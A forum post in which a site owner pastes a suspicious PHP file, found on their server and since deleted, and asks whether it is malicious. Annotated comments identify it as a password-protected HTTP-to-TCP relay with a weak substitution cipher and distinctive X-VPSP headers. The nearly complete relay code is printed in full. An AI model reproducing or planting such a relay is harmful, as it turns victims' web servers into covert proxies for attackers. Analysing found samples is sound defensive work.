blackdragon
Not Solved

I installed the Google Analytics plugin a while back and thought I’d check to see what the metrics were like. Looking at the output, I saw no results whatsoever. Obviously I became suspicious as to why.

Checking into the active plugins I came across this warning: Warning(2) 

Cannot modify header information 

It mentioned the two pages that seemed to be causing the issue. One of the pages was named user_aster.php which I didn’t recognize. After making a copy of it from the server to my local drive, I deleted the file and everything seems to be working fine. 

My question is geared more towards the content of this file. I’d like to know if the code in this file may be malicious. 
Can someone with more PHP experience have a quick look at it and give me their opinion, please? Here is the code:

// Reviewer summary (defensive reading of the sample): this script is an HTTP-to-TCP relay.
// The request body carries a small binary header (mode byte, "OK" marker, two buffer
// sizes, password, TLS flag, target host, target port). After the password check the
// script opens a socket to the host and port named by the requester and copies bytes in
// both directions, so the outbound connection is made by the web server itself.
// It always sets an X-VPSP-VERSION response header and uses X-VPSP-ERROR / X-VPSP-HOST /
// X-VPSP-TARGET on error paths; that prefix and the vpsp_ constant names are distinctive
// strings to search for in web-root files, access logs and captured traffic.
// NOTE(review): the typographic quotes come from the forum paste, and neither a PHP open
// tag nor a definition of vpsp_version is visible; the start of the file was presumably
// lost when it was posted.

// Hard-coded shared secret and cipher key; both are the same literal string.
define(‘vpsp_pwd’, ‘www.w3c.org’);
define(‘vpsp_enc_key’, ‘www.w3c.org’);
// ~E_ALL clears every error level, so the script reports no errors or warnings.
error_reporting(~E_ALL);
// No execution time limit (the @ hides the warning if the call is not permitted).
@set_time_limit(0);
// Flush output after every output call so relayed data is sent as it arrives.
ob_implicit_flush(1);
// Stop running when the HTTP client disconnects.
ignore_user_abort(0);
// The response is declared as an opaque binary stream.
header(‘Content-type: application/octet-stream’);
header(‘Content-Transfer-Encoding: binary’);
header(‘X-VPSP-VERSION: ‘. vpsp_version);
// Everything below is parsed from the raw request body, not from form fields.
$input = fopen(‘php://input’, ‘r’);
// First body byte: non-zero selects the substitution-cipher mode for the rest of the exchange.
define(‘vpsp_enc’,  ord(fread($input, 1)) != 0);
// Bare expression statement; it has no effect.
$ok;
if (vpsp_enc) {
// Build the byte substitution table once, then derive its inverse for decoding.
if (isset($GLOBALS[‘vpsp_pe’]) == false) {
$GLOBALS[‘vpsp_ks’] = VC_GenerateKeyHash(vpsp_enc_key);
$GLOBALS[‘vpsp_pe’] = VC_Init(vpsp_enc_key, $GLOBALS[‘vpsp_ks’]);
}
$GLOBALS[‘vpsp_pd’] = array_flip($GLOBALS[‘vpsp_pe’]);

// Two-byte marker: must decode to "OK", which doubles as a check that the key matches.
$ok = VC_Decrypt(fread($input, 2));
if ($ok != ‘OK’) {
// Failure is reported through response headers, including this script's own URL.
header(‘X-VPSP-ERROR: bad_enc_key’);
header(‘X-VPSP-HOST: ‘. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]);
exit;
}
// Two 4-byte big-endian integers: chunk size for reading the request body and
// chunk size for reading from the target socket.
$rBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
$sBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
// Length-prefixed password (one length byte, then that many bytes).
$reqPwdLen = ord(VC_Decrypt(fread($input, 1)));
$reqPwd = ($reqPwdLen > 0) ? VC_Decrypt(fread($input, $reqPwdLen)) : ”;
// One flag byte, a length-prefixed host name, and a 2-byte big-endian port:
// the connection target is chosen entirely by the requester.
$https = ord(VC_Decrypt(fread($input, 1)));
$host = VC_Decrypt(fread($input, ord(VC_Decrypt(fread($input, 1)))));
$port = ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
} else {
// Plain mode: the same header layout, read without the substitution step.
$ok = fread($input, 2);
if ($ok != ‘OK’) {
header(‘X-VPSP-ERROR: bad_request’);
header(‘X-VPSP-HOST: ‘. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]);
exit;
}
$rBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$sBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$reqPwdLen = ord(fread($input, 1));
$reqPwd = ($reqPwdLen > 0) ? fread($input, $reqPwdLen) : ”;
$https = ord(fread($input, 1));
$host = fread($input, ord(fread($input, 1)));
$port = ord(fread($input, 1)) * 256 + ord(fread($input, 1));
}

// Access control is a single comparison against the constant defined at the top.
// On mismatch a 401-style message is echoed into the response body and the script ends.
if ($reqPwd !== vpsp_pwd) {
$resp = “HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION: “. vpsp_version. “\r\nX-VPSP-ERROR: bad_password\r\nX-VPSP-HOST: “. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]  . “\r\nConnection: close\r\n\r\n”;
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}

// Flag value 1 switches the outbound connection to the ssl:// transport.
if ($https == 1) {
$host = ‘ssl://’. $host;
}

// Outbound connection from the web server to the requested host and port, 20 s timeout.
$fsok = fsockopen($host, $port, $errno, $errstr, 20);
if ($fsok == false) {
// Connection failure is reported in the body, with the socket error text base64-encoded
// and the target host echoed back in X-VPSP-TARGET.
$resp = “HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION: “. vpsp_version. “\r\nX-VPSP-ERROR: host_down\r\nX-VPSP-ERROR-TEXT: “. base64_encode($errstr) .”\r\nX-VPSP-HOST: “. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]. “\r\nX-VPSP-TARGET: “. str_replace(‘ssl://’, ”, $host). “\r\nConnection: close\r\n\r\n”;
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}

// Upstream leg: the remainder of the request body is forwarded to the target socket.
while ($wbuffer = fread($input, $rBuffLen)) {
if (vpsp_enc) {
fwrite($fsok, VC_Decrypt($wbuffer));
} else {
fwrite($fsok, $wbuffer);
}
}

fflush($fsok);

// Downstream leg: whatever the target sends back is written into the HTTP response.
while ($rbuffer = fread($fsok, $sBuffLen)) {
if (vpsp_enc) {
echo VC_Encrypt($rbuffer);
} else {
echo $rbuffer;
}
}
fflush($fsok);
fclose($fsok);

/**
 * Returns the MD5 digest of $str as a raw byte string rather than hex text.
 *
 * The 32-character hex digest is cut into two-character pieces and each piece
 * is converted to one byte, giving 16 bytes.
 *
 * @param string $str Input to hash.
 * @return string 16-byte digest.
 */
function MD5Hash($str) {
$m = md5($str);
$s = ”;
  // chunk_split inserts a line break after every two hex characters; the pieces are then
  // separated on the newline and turned into bytes one at a time.
  foreach(explode(“\n”, trim(chunk_split($m, 2))) as $h) {
  $s .= chr(hexdec($h));
  }
return $s;
}

/**
 * Builds the 256-entry byte substitution table used by VC_Encrypt.
 *
 * The table starts as 0..255, is shuffled by key-dependent swaps, and every
 * entry is finally XORed with $ks. Swaps and a constant XOR keep the entries
 * distinct, which is what lets the caller invert the table with array_flip.
 * The result depends only on the key, so a given input byte always maps to the
 * same output byte: this is a fixed substitution, i.e. obfuscation of the
 * relayed stream rather than strong encryption.
 *
 * @param string $key Key string; an empty key returns the unshuffled table.
 * @param int    $ks  One-byte value derived from the key (see VC_GenerateKeyHash).
 * @return array Table indexed by input byte value.
 */
function VC_Init($key, $ks) {
$s = range(0, 255);
if (strlen($key) == 0) {
return $s;
}
$km = MD5Hash($key);
$kx = ”;
// 16 digests of 16 bytes each give 256 bytes of key material, one per table index.
for ($i = 0; $i < 16; $i++) {
$kx .= MD5Hash($km. $km[$i].  chr($ks));
}
// Between 1 and 15 shuffle passes, chosen from $ks.
$r = ($ks % 0x0F) + 1;
$j = $ks;
for ($n = 0; $n < $r; $n++) {
for ($i = 0; $i < 256; $i++) {
// Pick the swap partner from the running index, the current entry, the pass number
// and the key material, then exchange entries $i and $j.
$j = (($j + $s[$i] + $n + ord($kx[$i])) ^ $ks) % 256;
$t = $s[$i];
$s[$i] = $s[$j];
$s[$j] = $t;
}
}
for ($i = 0; $i < 256; $i++) {
$s[$i] = $s[$i] ^ $ks;
}
return $s;
}

/**
 * Reduces a key string to a single value in the range 0..255.
 *
 * The value is the sum of the 16 raw MD5 digest bytes of $key, modulo 256.
 *
 * @param string $key Key string.
 * @return int Value between 0 and 255.
 */
function VC_GenerateKeyHash($key) {
$m = MD5Hash($key);
$kt = 0;
for ($i = 0; $i < 16; $i++) {
$kt += ord($m[$i]);
}
return $kt % 256;
}

/**
 * Encodes a string by replacing each byte with its entry in the global
 * substitution table (the vpsp_pe entry of $GLOBALS).
 *
 * The table must already have been built; the script does that only in the
 * cipher mode branch of the top-level code.
 *
 * @param string $str Bytes to encode.
 * @return string Encoded bytes, same length as the input.
 */
function VC_Encrypt($str) {
$pe = $GLOBALS[‘vpsp_pe’];
$out = ”;
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pe[ord($str[$y])]);
}
return $out;
}

/**
 * Decodes a string by replacing each byte with its entry in the inverse
 * substitution table (the vpsp_pd entry of $GLOBALS, produced by array_flip
 * on the encoding table).
 *
 * @param string $str Bytes to decode.
 * @return string Decoded bytes, same length as the input.
 */
function VC_Decrypt($str) {
$pd = $GLOBALS[‘vpsp_pd’];
$out = ”;
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pd[ord($str[$y])]);
}
return $out;
}
?>

Thanks in advance    